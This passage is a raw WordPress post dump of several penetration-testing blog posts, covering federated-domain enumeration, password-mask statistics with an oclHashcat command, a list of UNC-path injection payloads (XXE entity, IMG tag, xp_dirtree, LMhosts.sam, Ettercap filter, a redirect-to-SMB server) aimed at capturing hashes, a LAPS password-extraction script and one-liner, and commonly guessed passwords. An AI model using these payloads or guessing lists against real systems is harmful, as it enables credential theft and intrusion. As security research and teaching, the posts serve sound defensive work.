      "DomainName":"example.com",
      "FederationBrandName":"ExampleCompany"
    }
  2. A response for a domain managed by Microsoft:
    {
      "MicrosoftAccount":1,
      "NameSpaceType":"Managed",
      "Login":"support@OtherExample.com",
      "DomainName":"OtherExample.com",
      "FederationBrandName":"Other Example",
      "TenantBrandingInfo":null,
      "cloudinstancename":"login.microsoftonline.com"
    }
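The branching on those two responses comes down to checking NameSpaceType. Here's a rough Python sketch of that parsing step (not the actual PowerShell wrapper; the sample response is a trimmed, fake version of the ones above):

```python
import json

def classify_realm(response_text):
    # NameSpaceType tells you where authentication happens:
    #   "Federated" -> a federation server such as ADFS (see AuthURL)
    #   "Managed"   -> authentication handled by Microsoft
    realm = json.loads(response_text)
    ns = realm.get("NameSpaceType")
    if ns == "Federated":
        return ("Federated", realm.get("AuthURL"))
    if ns == "Managed":
        return ("Managed", None)
    return ("Unknown", None)

federated = ('{"NameSpaceType":"Federated","Login":"karl@example.com",'
             '"AuthURL":"https://adfs.example.com/adfs/ls/"}')
```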

The PowerShell tool

To make this easier to parse, I wrote a PowerShell wrapper that makes the request out to Microsoft, parses the JSON response, and returns the information from Microsoft in a datatable. You can also use the -cmd flag to return a command that you can run to try to authenticate to either federated domain servers or to the Microsoft servers. Here’s a link to the code - https://github.com/NetSPI/PowerShell/blob/master/Get-FederationEndpoint.ps1

Here’s an example for each scenario:

Federated Endpoint:

PS C:> Get-FederationEndpoint -domain example.com -cmd | ft -AutoSize

Make sure you use the correct Username and Domain parameters when you try to authenticate!

Authentication Command:
Invoke-ADFSSecurityTokenRequest -ClientCredentialType UserName -ADFSBaseUri https://example.com/ -AppliesTo https://example.com/adfs/services/trust/13/usernamemixed -UserName 'test' -Password 'Summer2016' -Domain 'example.com' -OutputType Token -SAMLVersion 2 -IgnoreCertificateErrors

Domain      Type      BrandName           AuthURL                                                                                                                                                     
------      ----      ---------           -------                                                                                                                                                     
example.com Federated Example Company LLC https://example.com/app/[Truncated]
If you're trying to authenticate with this command, note that it does require you to guess/know the domain username of the target (hence the warning). Frequently, we’ll see that the email address account name (ex. kfosaaen) does not line up with the domain account name (ex. a123456).

Microsoft Managed:

PS C:> Get-FederationEndpoint -domain example.com -cmd | ft -AutoSize

Domain is managed by Microsoft, try guessing creds this way:

    $msolcred = get-credential
    connect-msolservice -credential $msolcred

Domain      Type    BrandName AuthURL
------      ----    --------- -------
example.com Managed example    NA
If you get back the “managed” response from Microsoft, you can just use the Microsoft AzureAD tools to log in (or attempt logins). Since this returns a datatable, it's easy to pipe in a list of emails to look up federation information on.

*Screenshot Note - This was renamed from Get-ADFSEndpoint to Get-FederationEndpoint (10/06/16)

Prerequisites

Both of the authentication methods that the script returns are taken from Microsoft, and since I don’t own that code, I can’t redistribute it. But here are some links to get the authentication tools from them.

The code for Invoke-ADFSSecurityTokenRequest comes from this Microsoft post:

The Microsoft managed authentication side (connect-msolservice) comes from the Azure AD PowerShell module. See Here:

Finally, here’s a nice rundown from Microsoft on how you can connect to any of the Microsoft online services with PowerShell:

Future Work

Taking this further, you could wrap both of these authentication functions to automate brute force password guessing attacks against accounts. Additionally, you could just use this script to enumerate the federation information for the Alexa top 1 million sites. Personally, I won’t be doing that, as I don’t want to send a million requests out to Microsoft. I actually have some other stuff in the works that is directly related to this, but it’s not quite ready to post yet. So keep an eye on the blog for more interesting ADFS attacks. [post_title] => Using PowerShell to Identify Federated Domains [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => using-powershell-identify-federated-domains [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:47:27 [post_modified_gmt] => 2021-06-08 21:47:27 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6298 [menu_order] => 650 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [46] => WP_Post Object ( [ID] => 5987 [post_author] => 10 [post_date] => 2016-01-19 07:00:33 [post_date_gmt] => 2016-01-19 07:00:33 [post_content] =>

Over the course of the last year, we’ve cracked a lot of NTLM domain password hashes. During many of our internal penetration tests, we grab the password hashes for all of the domain users and attempt to crack them. Throughout the year, we keep track of the hashes that we’ve cracked and try to gain some insight into how people are choosing passwords, and what we can do to identify some common weaknesses.

At the end of last year, we took a look at the breakdown of lengths, common words, and number of duplicates. Since we captured more than double the number of hashes this year compared to 2014, it got to be a pain to track each and every domain hash cracking job. Going forward, I’m looking to implement some better metrics in our cracking process to better tally these numbers and trends throughout the year.

I’ve compiled a list of our top password masks for the year. This was pretty easy to do, as we keep a running list of the cracked passwords for the year to reuse in other password cracking attempts. I have a handy Perl script that I feed the cracked list into to determine the masks.
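The Perl script itself isn't reproduced here, but the idea is simple enough to sketch. Below is a minimal Python equivalent (my own illustration, not NetSPI's actual tool; dedicated tools like PACK's statsgen handle this more robustly):

```python
from collections import Counter

def to_mask(password: str) -> str:
    """Translate a cracked password into a hashcat-style mask."""
    pieces = []
    for ch in password:
        if ch.islower():
            pieces.append("?l")
        elif ch.isupper():
            pieces.append("?u")
        elif ch.isdigit():
            pieces.append("?d")
        else:
            pieces.append("?s")  # everything else: special character
    return "".join(pieces)

def top_masks(cracked, n=10):
    """Tally the masks across a cracked-password list, most common first."""
    return Counter(to_mask(p) for p in cracked).most_common(n)

print(to_mask("Spring15"))  # ?u?l?l?l?l?l?d?d
```

Feeding a year's worth of cracked passwords through top_masks produces exactly the kind of ranking shown in the top 10 list.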

Below is the top 10 list of password masks for 2015’s cracked NTLM passwords.

The Top 10

#    Mask                   Example Password   % of Matching Cracked Passwords
1    ?u?l?l?l?l?l?d?d       Spring15           5.45%
2    ?u?l?l?l?l?l?l?d?d     January15          4.14%
3    ?u?l?l?l?l?l?l?l?d?d   December15         3.10%
4    ?u?l?l?l?d?d?d?d       Fall2015           2.91%
5    ?u?l?l?l?l?d?d?d?d     March2015          2.79%
6    ?u?l?l?l?l?l?d?d?d?d   Winter2015         2.72%
7    ?u?l?l?l?l?l?l?d       January1           2.34%
8    ?u?l?l?l?l?d?d?d       March123           1.98%
9    ?u?l?l?l?l?l?l?l?d     February1          1.72%
10   ?u?l?l?l?l?l?d?d?d     August123          1.51%

Legend
?u = Uppercase letter
?l = Lowercase letter
?d = Decimal number (0-9)

Given that we see some combination of month, day, season, and/or year in every domain that we encounter, I figured I would do all of our examples in that format. For what it’s worth, all of the example passwords here were found in the cracked list.

The top 10 patterns listed above account for 28.66% of the cracked password list.

The top 40 patterns (Download Links Below) for the year account for 50.83% of the passwords that we cracked for the year (not 50% of the hashes gathered for the year). Please keep in mind that these are just the cracked passwords, and that this is a de-duplicated list: it does not account for duplicates, so it does not truly reflect the mileage that you could get out of these masks on a typical domain. That said, running the top 10 masks against a recent domain dump allowed us to crack 29% of the hashes in seven and a half minutes, so this does give pretty decent coverage.

Hypothetically, if we cracked 80% of the unique hashes for the year, this list of 40 masks could crack about 40% of the unique domain passwords. Statistics are fun, but since I don’t have solid numbers for every NTLM domain hash that we attempted to crack this year, I can’t really give you this info.
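The arithmetic behind that estimate is just the product of the two rates (the 80% crack rate is the hypothetical figure from above, not a measured one):

```python
masks_share_of_cracked = 0.5083   # top 40 masks cover 50.83% of cracked passwords
hypothetical_crack_rate = 0.80    # assumed fraction of unique hashes cracked

# Estimated share of ALL unique domain passwords the 40 masks would recover
estimate = masks_share_of_cracked * hypothetical_crack_rate
print(f"{estimate:.0%}")  # 41%
```

Which rounds down to the "about 40%" quoted above.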

Interesting things to note

  1. Not a single one of our top ten masks has a special character in it.
    1. We actually don’t hit a special character in a mask until #12 on the list. In fact, 63% of the passwords that were cracked did not contain a special character. This was only slightly surprising, as you can still have a password that hits (most) Windows GPO complexity requirements without having special characters.
  2. Of the top 40 patterns, all of the masks are between 8 and 12 characters.
    1. Again, not a big surprise as most domain password length requirements are set at 8 characters.
  3. People really like capitalized words for their passwords.
    1. Only four of the top 40 masks don’t follow the pattern of a dictionary word with something appended. I’d like to say that this is just skewed by our cracking methodology, but most of the passwords that we’re running into contain a dictionary word.

So what do I do with these?

OCLHashcat has support for these mask files. Just use the attack mode 3 (brute force) option and provide the list of masks to use in a text file.
./oclHashcat64.bin -m 1000 hashes.txt -o output.txt -a 3 2015-Top40-Time-Sort.hcmask
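For reference, an .hcmask file is just plain text with one mask per line, tried in order. The file in the command above is our download, but a minimal hand-rolled version built from the top three masks in the table would look like this:

```
?u?l?l?l?l?l?d?d
?u?l?l?l?l?l?l?d?d
?u?l?l?l?l?l?l?l?d?d
```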

When should I use these?

Personally, I would use these after I’ve gone through some dictionaries and rules. Since this is a brute force attack (on a limited key-space) this is not always as efficient as the dictionary and rule-based attacks. However, I have found that this works well for passwords that are not using dictionary words. For example, a dictionary and rule would catch Spring15, but it would be less likely to catch Gralwu94. However, Gralwu94 would be caught by a mask attack in this situation.

How long would this take?

That depends. We have a couple of GPU cracking boxes that we can distribute this against, but if we just ran it on our main cracking system, it would take about three and a half days to complete. That’s a really long time. There are a few weird ones in the list that were easy to crack with word lists and rules (resulting in lots of mask hits), but that take a long time to brute force by key space (?u?l?l?l?l?l?l?l?l?l?d?d - Springtime15). I went through and timed each of the top 40 and created a time-sorted list that you can stop partway through when you start hitting your own time limits.
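To get a back-of-the-envelope feel for those runtimes, multiply the charset size of each mask position and divide by your hash rate. A quick Python sketch (the hash rate here is an assumed round number, not a benchmark of our rig):

```python
# Charset sizes for the standard hashcat built-in sets
CHARSET_SIZES = {"?u": 26, "?l": 26, "?d": 10, "?s": 33}

def keyspace(mask: str) -> int:
    """Number of candidates a mask generates."""
    total = 1
    for i in range(0, len(mask), 2):  # masks are two-character tokens
        total *= CHARSET_SIZES[mask[i:i + 2]]
    return total

space = keyspace("?u?l?l?l?l?l?l?l?l?l?d?d")  # the Springtime15 mask
assumed_rate = 10e9                            # NTLM hashes/sec (assumption)
print(f"{space:,} candidates, ~{space / assumed_rate / 86400:.1f} days")
```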

2015 - Top 40 Masks List

2015 - Time Sorted Top 40 Masks List

[post_title] => NetSPI’s Top Password Masks for 2015 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspis-top-password-masks-for-2015 [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:51 [post_modified_gmt] => 2021-04-13 00:05:51 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=5987 [menu_order] => 660 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [47] => WP_Post Object ( [ID] => 4496 [post_author] => 10 [post_date] => 2015-07-22 07:00:36 [post_date_gmt] => 2015-07-22 07:00:36 [post_content] => Recently there was a big fuss over the “Redirect to SMB” blog that was put out by Brian Wallace. Personally, I think that the recent scare over this vulnerability is a little overstated, but it could be a useful way to capture an SMB hash. I was already in the process of putting together this list, so here are a bunch of other ways that you can force a UNC path and capture credentials. UNC paths are one of my favorite things to use during a pen test. Once I force an account to authenticate to me over SMB, I have two options: Capture and Crack the hash or Relay the hash on to another computer. Plenty has been written about both options, so we won’t cover that here. The methods outlined below should give you some options for where you can use UNC paths to force authentication back to your attacking box. Firewall rules and file restrictions can really mess up some of these, so your mileage may vary. For demo purposes, we will be using "\\192.168.1.123\test" as our listening UNC path / SMB server. Here's a linked table, if you want to directly jump to one of these:

1. XML External Entity Injection

External entity injection can be a very handy way to read files off of a remote system, but if that server happens to be a Windows system, you can utilize a UNC path.
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:////192.168.1.123/test.txt" >]>
<foo>&xxe;</foo>
Antti Rantasaari from NetSPI has been doing some really cool work in this space, so check out his blogs for more info.

2. Broken IMG Tags

Using a UNC path for an IMG tag can be pretty useful. Depending on where your SMB listener is (on the internal network) and what browser the victim is using (IE), there’s a chance that the browser will just send the hash over automatically. These can also be embedded anywhere that may process HTML (email, thick apps, etc.). “Internet Explorer's Intranet zone security setting must be set to Automatic logon only in Intranet zone. This is the default setting for Internet Explorer.” (Source)
<img src=\\192.168.1.123\test.gif>

3. Directory Traversals

I wrote about this a while back, but web applications that allow you to specify a file path may be vulnerable to UNC path injection. By inputting a UNC path (instead of your typical ..\..\ or C:\ directory traversal), you may be able to capture the credentials for the service account that runs the web application. Change the Id parameter in this URL:
  • https://test.example.com/Print/FileReader.aspx?Id=/reports/test.pdf&Type=pdf
To this:
  • https://test.example.com/Print/FileReader.aspx?Id=\\192.168.1.123\test.pdf&Type=pdf

4. Database Queries/injections

My co-worker, Scott Sutherland, wrote about using built-in SQL server procedures to do SMB relay attacks. This one can be really handy if you have databases that allow the “domain users” group to authenticate. It’s surprising to see how many database servers are running with domain admin service accounts. Just use the xp_dirtree or xp_fileexist stored procedures and point them at your SMB capture server.
xp_dirtree '\\192.168.1.123\test'
xp_fileexist '\\192.168.1.123\test'
There’s a bunch more SQL procedures out there that you could potentially use, but these two are pretty reliable. Anytime you can read a file in SQL, you can probably use a UNC path in it. This attack also applies to Oracle. The Metasploit "auxiliary/admin/oracle/ora_ntlm_stealer" module can do it and there's a great blog about Oracle SMB relay on the ERPScan blog.

5. File Shares

If you have write access to a file share, you have a couple of options for getting hashes.
  1. Here’s a great one from Mubix - modify the icon path of .lnk shortcut files to point at a UNC path
  2. Microsoft Word documents can also be modified with Metasploit (use auxiliary/docx/word_unc_injector) to inject UNC paths into the documents.

6. Drive Mapping on Login

This may be overkill, but it could be handy for persistence. By modding any scripts used to map network drives for users, you can add your own UNC path in as an additional drive to map. This is handy, as any user who has this drive added will send you credentials every time they log in. If you don't have rights to overwrite the startup scripts, GDS Security has a nice blog about setting this up with Metasploit and spoofing the startup script server.
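As a sketch, the modification is a single extra line in the logon script, pointing a drive at your listener (the drive letter and share here are illustrative):

```
net use Z: \\192.168.1.123\test /persistent:no
```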

7. Thick Applications

Basically, anywhere that you can tell an app to load a file, you can potentially add in a UNC path. We have seen many file upload dialogs in thick applications that allow this. This is even better with hosted thick client applications that are running under the context of a terminal server user (and not the application user). This can also be really handy for kiosk applications. For more thick app breakouts, check out Scott's "Breaking Out!" blog.

8. The LMhosts.sam file

Mubix has a couple of great UNC tricks in his “AT is the new black” presentation. I already called out the .lnk files up above, but by modifying the LMhosts.sam file, you can sneak in a UNC path that forces the user to load a remote hosts file. Here's a sample LMhosts.sam using our UNC path:
192.168.1.123    netspi #PRE
#BEGIN_ALTERNATE
#INCLUDE \\netspi\test\hosts.txt
#END_ALTERNATE

9. SharePoint

On many of our pen tests, we get access to accounts that can edit everybody’s favorite intranet site, SharePoint. Using any of the other listed methods, you should be able to drop files or direct UNC links on the SharePoint site. Just make sure you go back and clean up the page(s) when you’re done.

10. ARP spoofing - Ettercap filters

There are tons of fun things that you can do with Ettercap filters. One of those things is overwriting content with UNC paths. By injecting a UNC path into someone’s HTML document, clear text SQL query, or any of the protocols mentioned above you should be able to get them to authenticate back to your attacking machine.
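As an illustrative example (my own sketch, untested here; check the etterfilter man page for the exact grammar), a filter that injects a UNC IMG tag into HTTP responses might look like this:

```
# compile with: etterfilter unc.filter -o unc.ef
if (ip.proto == TCP && tcp.src == 80) {
    replace("</body>", "<img src=\"\\\\192.168.1.123\\test.gif\"></body>");
    msg("UNC path injected.\n");
}
```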

Honorable Mention:

11. Redirect to SMB

For what it’s worth, this issue has been out for a very long time. Basically, you get your victim to visit your malicious HTTP server and you 302 redirect them to a UNC file location. If the browser (or program making the HTTP request) automatically authenticates, then the victim will send their hash over to the UNC location. Some of the methods above (See XXE) allow for this if you use an HTTP path instead of the UNC path.
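A minimal sketch of that redirect server in Python (my own illustration of the technique, not the original proof of concept):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

UNC_TARGET = "file:////192.168.1.123/test.txt"  # the demo listener from above

class RedirectToSMB(BaseHTTPRequestHandler):
    """Answer every GET with a 302 pointing at a file:// UNC location."""

    def do_GET(self):
        self.send_response(302)
        self.send_header("Location", UNC_TARGET)
        self.end_headers()

    def log_message(self, *args):
        pass  # keep the console quiet

def serve(port=8080):
    """Build the listener; call .serve_forever() on the result to run it."""
    return HTTPServer(("0.0.0.0", port), RedirectToSMB)
```

Whether the victim actually coughs up a hash still depends on the client honoring the redirect and auto-authenticating, as described above.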

Conclusion

I'm sure that there's a couple that I missed here, but feel free to add them in the comments. [post_title] => 10 Places to Stick Your UNC Path [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => 10-places-to-stick-your-unc-path [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:46:38 [post_modified_gmt] => 2021-06-08 21:46:38 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=4496 [menu_order] => 668 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [48] => WP_Post Object ( [ID] => 4020 [post_author] => 10 [post_date] => 2015-05-05 07:00:58 [post_date_gmt] => 2015-05-05 07:00:58 [post_content] =>

Intro

Managing credentials for local administrator accounts is hard to do. From setting strong passwords, to setting unique passwords across multiple machines, we rarely see it done correctly. On the majority of our pen tests we see that most of the domain computers are configured with the same local admin credentials. This can be really handy as an attacker, as it provides us lateral access to systems across the network.

One of the reported fixes (from Microsoft) is to store the local admin passwords in LDAP as a confidential attribute of the computer account. This can be automated using Microsoft tools, and strong local passwords can be enforced (and automatically changed). In theory, this is a nice idea. But in practice, it results in the cleartext storage of passwords (not good). Previous attempts at local administrator credential management (from Microsoft) resulted in local administrator credentials being exposed to all users on the domain (through group policy preferences). The GPP cpassword storage issue was fixed (5/13/14), and we’re not seeing it as frequently anymore.

LAPS


LAPS is Microsoft’s tool to store local admin passwords in LDAP. As long as everything is configured correctly, it should be fine to use. But if you don’t set the permissions correctly on the LDAP attributes, you could be exposing the local admin credentials to users on the domain. LAPS uses two LDAP attributes to store the local administrator credentials: ms-MCS-AdmPwd (stores the password) and ms-MCS-AdmPwdExpirationTime (stores when it expires). The Microsoft recommendation is to remove the extended rights to the attributes from specific users and groups. This is a good thing to do, but it can be a pain to get set up properly. Long story short, if you’re using LAPS, someone on the domain can probably read those local admin credentials in cleartext. This will not always be a privilege escalation route, but it could be handy data to have when you're pivoting to sensitive systems after you’ve escalated. In our demo domain, our LAPS deployment defaulted to allowing all domain users to have read access to the password. We also could have screwed up the install instructions.

I put together a quick PowerShell script to pull the LAPS specific LDAP attributes for all of the computers joined to the domain. I used Scott Sutherland’s Get-ExploitableSystems script (now included in PowerView) as the template. You can find it on my GitHub page.

Script Usage and Output

Here’s the output using an account that does not have rights to read the credentials (but proves they exist):

PS C:\> Get-LAPSPasswords -DomainController 192.168.1.1 -Credential DEMO\karl | Format-Table -AutoSize

Hostname                    Stored Readable Password Expiration
--------                    ------ -------- -------- ----------
WIN-M8V16OTGIIN.test.domain   0      0               NA
WIN-M8V16OTGIIN.test.domain   0      0               NA
ASSESS-WIN7-TEST.test.domain  1      0               6/3/2015 7:09:28 PM

Here’s the same command being run with an account with read access to the password:

PS C:\> Get-LAPSPasswords -DomainController 192.168.1.1 -Credential DEMO\administrator | Format-Table -AutoSize

Hostname                    Stored Readable Password       Expiration
--------                    ------ -------- --------       ----------
WIN-M8V16OTGIIN.test.domain   0      0                     NA
WIN-M8V16OTGIIN.test.domain   0      0                     NA
ASSESS-WIN7-TEST.test.domain  1      1      $sl+xbZz2&qtDr 6/3/2015 7:09:28 PM

The usage is pretty simple and everything is table friendly, so it’s easy to export to a CSV.

Special thanks to Scott Sutherland for letting me use his Get-ExploitableSystems script as the bones for the script. The LDAP query functions came from Carlos Perez's PoshSec-Mod (and also adapted from Scott's script). And the overall idea to port this over to a Powerview-friendly function came from a conversation with @_wald0 on Twitter.

Links

LDAP is a great place to mine for sensitive data. Here’s a couple of good examples:

Bonus Material

If you happen to have the AdmPwd.PS PowerShell module installed (as part of LAPS), you can use the following one-liner to pull all the local admin credentials for your current domain (assuming you have the rights; note that $colResults is assumed to hold the computer objects returned by an earlier ADSI search of the domain, which isn't shown here):

foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
[post_title] => Running LAPS Around Cleartext Passwords [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => running-laps-around-cleartext-passwords [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:46:18 [post_modified_gmt] => 2021-06-08 21:46:18 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=4020 [menu_order] => 674 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [49] => WP_Post Object ( [ID] => 3585 [post_author] => 10 [post_date] => 2015-04-27 07:00:32 [post_date_gmt] => 2015-04-27 07:00:32 [post_content] =>

A little over two years ago, we built our first GPU cracking box. At the time, there was pretty limited information on what people were doing to build a decent cracking box, especially if you were trying to do so without breaking the bank. As with any piece of technology, things go out of date, things get upgraded, and documentation needs to get updated. Since it’s now two years since I wrote about our first system, I figured it was time to write an update to show what we’re actually using for cracking hardware now.

The Case

We currently have two cracking systems, Development and Production. Our development system is seated in a really nice (and relatively cheap) case that we picked up from MiningRigs.net. The big downside of this case is that we can’t immediately buy another one. The group making the case had recently switched to a Kickstarter model (we were one of the only backers), but they secured outside funding for the cases and are now building more. As soon as they have them ready, we're planning on picking up another one.


Our production system is currently housed in a much lower-tech case… Three Milkcrates. As you can see, we’ve graduated from server shelving to an arguably crazier option. After seeing a number of Bitcoin miners using the milkcrate method for cases, we moved our cards over. This has actually worked quite well. The only issue that we’ve run into (outside of noise) is high temperatures on some of the cards. We’ve been able to keep the heat issues away by manually setting the fan speeds on all of the cards to 100%.


*Update (5/19/15): We actually got another rack-mount case for our production system. Goodbye milk crates.


The Motherboard

One of the big changes that we were happy to see over the last two years was the move by hardware manufacturers to embrace Bitcoin miners (even though most have moved off of GPU mining). ASRock now makes a Bitcoin specific motherboard (H81 PRO BTC) that is specifically geared towards running multiple GPUs. With six PCI-E slots, it’s a very inexpensive ($65) choice for creating a cracking box. Five of the slots are PCI-E 1x slots (and mounted pretty closely together), so you will need to use risers to attach your cards.

The Risers/Extenders

Another Bitcoin-focused product that we’ve been using is the USB 3.0 PCI-E riser (or extender). These little devices allow you to put a PCI-E 16x card into a PCI-E 1x slot; the card then attaches to the motherboard with a USB cable, effectively extending your PCI-E slots. These are much cleaner and more reliable than the ribbon riser cables we started with.

The Cards

I will say that I really like the newer cards (R9 290) that we are currently running. They have decent cracking rates and I really haven’t had too many issues with them so far. The biggest issue has been heat. This can mostly be mitigated by having decent airflow around the case and setting the fan speeds on your cards to the max. The fan speeds can be set using the aticonfig command (pre-R-series cards) or od6config for newer cards. One of the biggest pains that I’ve dealt with on our systems is getting all the fans set correctly for all the cards, specifically when you have a mix of older and newer cards. For simplicity’s sake, I would recommend going with one card model for your cracking box. The newer cards are nice, but if you can find someone trying to offload some older 7950s, I would recommend buying those.
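For reference, the pre-R-series fan bump looked roughly like this on our systems (treat these invocations as assumptions to verify against your install, as exact flags vary across Catalyst driver versions, and od6config has its own syntax for the newer cards):

```
# Pin adapter 0's fan at 100% with aticonfig
DISPLAY=:0 aticonfig --pplib-cmd "set fanspeed 0 100"

# Repeat for each adapter index on a six-card board
for i in 0 1 2 3 4 5; do
    DISPLAY=:0 aticonfig --pplib-cmd "set fanspeed $i 100"
done
```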

The Power Supplies

Our recommendations on power supplies haven’t changed. Only running one to three cards? You will probably be fine with one power supply. Going any higher and you will want two. Shoot for higher wattage power supplies (800+) and get a Y-Splitter.

CPU/RAM/Hard Drive

All of these can be generic. It doesn’t hurt to max these out, but they don't really impact cracking performance. If you’re going to throw money around, throw it at your cards.

Here's a pretty general parts and pricing list if you want to build your own.

Component          Model                                    Est. Price
Case               6 GPU Rackmount Server Case              $495
Motherboard        ASRock Motherboard H81 PRO BTC           $64
Risers (6)         PCI-E 1X To 16X USB 3.0 Riser Card       $24
GPUs (6)           XFX Black Edition R9 290                 $1,884
Power Supply (2)   CORSAIR AX1200i 1200W                    $618
Power-Splitter     Dual PSU Adapter Cable                   $9
RAM                8 GB - Any Brand                         $50
CPU                Intel Celeron G1820 Dual-Core (2.7GHz)   $45
HDD                1 TB - Any Brand                         $50
Total                                                       $3,239
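A quick sanity check that the line items add up to the listed total:

```python
# Estimated prices from the parts list above, in dollars
parts = {
    "Case": 495, "Motherboard": 64, "Risers (6)": 24, "GPUs (6)": 1884,
    "Power Supply (2)": 618, "Power-Splitter": 9, "RAM": 50,
    "CPU": 45, "HDD": 50,
}
total = sum(parts.values())
print(f"${total:,}")  # $3,239
```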

If you have any questions or better parts recommendations, feel free to leave a comment below.

[post_title] => GPU Cracking: Rebuilding the Box [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gpu-cracking-rebuilding-box [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:46:09 [post_modified_gmt] => 2021-06-08 21:46:09 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=3585 [menu_order] => 676 [post_type] => post [post_mime_type] => [comment_count] => 16 [filter] => raw ) [50] => WP_Post Object ( [ID] => 2855 [post_author] => 10 [post_date] => 2015-03-02 07:00:36 [post_date_gmt] => 2015-03-02 07:00:36 [post_content] => It’s been a big year for password cracking at NetSPI. We’ve spent a lot of time refining our dictionaries and processes to more efficiently crack passwords. This has been a huge help during our pentests, as the cracked passwords have been the starting point for gaining access to systems and applications. While this blog focuses on the Windows domain hashes (LM/NTLM) that we’ve cracked this year, these statistics also translate into the other hashes that we run into (MD5, NetNTLM, etc.) during penetration tests. During many of our penetration tests, we gather domain password hashes (with permission of the client) for offline cracking and analysis. This blog is a summary of the hashes that we attempted to crack in 2014. Please keep in mind that this is not an all-encompassing sample. We do not collect domain hashes during every single penetration test, as some clients do not want us to. Additionally, these are Windows domain credentials. These are not web site or application passwords, which frequently have weaker password complexity requirements. This year, we collected 90,977 domain hashes. On average, we still see about ten percent of domain hashes that are stored with their LM hashes. This is due to accounts that do not change their passwords after the NTLM-only group policy gets applied. 
The LM hashes definitely helped our password cracking numbers, but they were not crucial to the cracking success. Of the collected hashes, 27,785 were duplicates, leaving 63,192 unique hashes. Of the total 90,977 hashes, we were able to crack 77,802 (85.52%). In terms of cracking effort, we typically put about a day's worth of effort into the hashes when we initially get them. I did an additional five days of cracking time on these, once we hit the end of the year. Here are nine of the top passwords that we used for guessing during online brute-force attacks:
  • Password1 - 1,446
  • Spring2014 - 219
  • Spring14 - 135
  • Summer2014 - 474
  • Summer14 - 221
  • Fall2014 - 150
  • Autumn14 - 15*
  • Winter2014 - 87
  • Winter14 - 63
*Fall14 is too short for most complexity requirements Combined, these account for 3.6% of all accounts. These are typically used for password guessing attacks, as they meet password complexity requirements and they’re easy to remember. This may not seem like a large number, but once we have access to one account, lots of options open up for escalation. Other notable reused passwords:
  • Changem3 - 820
  • Work1234 - 283
  • Password2 - 142
  • Company Name followed by a one (Netspi1)
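Season-plus-year patterns like these are trivial to enumerate for an online guessing list; a small sketch (my own helper, not one of our internal tools):

```python
def season_guesses(year):
    """Season/year password guesses in the formats we keep cracking."""
    guesses = []
    for season in ("Spring", "Summer", "Fall", "Autumn", "Winter"):
        guesses.append(f"{season}{year}")        # e.g. Spring2014
        guesses.append(f"{season}{year % 100}")  # e.g. Spring14
    return guesses

print(season_guesses(2014)[:2])  # ['Spring2014', 'Spring14']
```

Note that some of the short forms (like Fall14) fall below an eight-character minimum, as mentioned above.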
Cracked Password Length Breakdown: As you can see below, the cracked passwords peak at the eight character length. This is a pretty common requirement for minimum password length, so it’s not a big surprise that this is the most common length cracked. It should also be noted that we’re able to get through the entire eight-character key space in about two days, which means any password that was eight characters or less was cracked within two days. Some interesting finds:
  • Most Common Password (3,003 instances): [REDACTED] (This one was very specific to a client)
  • Longest Password: UniversityofNorthwestern1 (25 characters)
  • Most Common Length (33,654 instances - 43.2%): 8 characters
  • Instances of “password” (full word, case-insensitive): 3,266 (4.4%)
  • Blank passwords: 362
  • Ends with a “1”: 10,025 (12.9%)
  • Ends with “14”: 4,617 (6%)
  • Ends with “2014”: 2645 (3.4%)
  • Passwords containing profanity (“7 dirty words” - full words, no variants): 48
  • Top mask pattern: ?u?l?l?l?l?l?d?d (3,439 instances - 4.4%)
    • Matches Spring14
    • 8 Characters
    • Upper, lower, and number
  • The top 10 mask patterns account for 37% of the cracked passwords
    • The top 10 masks took 25 minutes for us to run on our GPU cracking system
  • One of our base dictionaries with the d3ad0ne rule cracked 52.7% of the hashes in 56 seconds
Note: I used Pipal to help generate some of these stats. I put together an hcmask file (to use with oclHashcat) of our top forty password patterns that were identified for this year. You can download them here. Additionally, I put together one for every quarter. These can be found in the previous quarter blogs: For more information on how we built our GPU-enhanced password cracking box, check out our slides For a general outline of our password cracking methodology check out this post [post_title] => NetSPI's Top Cracked Passwords for 2014 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspis-top-cracked-passwords-for-2014 [to_ping] => [pinged] => [post_modified] => 2022-09-30 12:39:49 [post_modified_gmt] => 2022-09-30 17:39:49 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=2855 [menu_order] => 684 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [51] => WP_Post Object ( [ID] => 1922 [post_author] => 10 [post_date] => 2014-12-15 07:00:13 [post_date_gmt] => 2014-12-15 07:00:13 [post_content] => During many of our penetration tests, we gather domain password hashes (with permission of the client) for offline cracking and analysis. This blog is a quick summary of the hashes that we attempted to crack in the third quarter of 2014 (and so far for this year). The plan is continue doing this again at the end of the year to see how we did overall for the year (three quarters down, one to go). Please keep in mind that this is not an all-encompassing sample. We do not collect domain hashes during every single penetration test, as some clients do not want us to. The sample for this quarter included 